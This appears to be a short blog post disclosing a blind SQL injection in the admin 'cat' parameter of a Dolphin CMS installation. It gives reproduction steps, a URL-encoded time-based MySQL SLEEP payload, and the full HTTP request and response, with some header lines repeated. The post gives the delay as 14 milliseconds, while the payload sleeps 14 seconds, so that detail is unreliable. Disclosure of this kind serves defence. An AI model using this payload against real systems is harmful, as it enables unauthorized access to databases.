Description
- It was noted that the admin functionality was vulnerable to Blind SQL injection
SQL Injection in Admin Functionality
Steps to Reproduce:
- Login as admin user and visit the page of "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
- Add the MySQL injection SLEEP payload to the "cat" value
- Notice that the backend would delay the HTTP response for 14 miliseconds
%27%20and%20(select*from(select(sleep(14)))a)--%20
// HTTP GET Request
GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]
// HTTP Response
HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510
No comments:
Post a Comment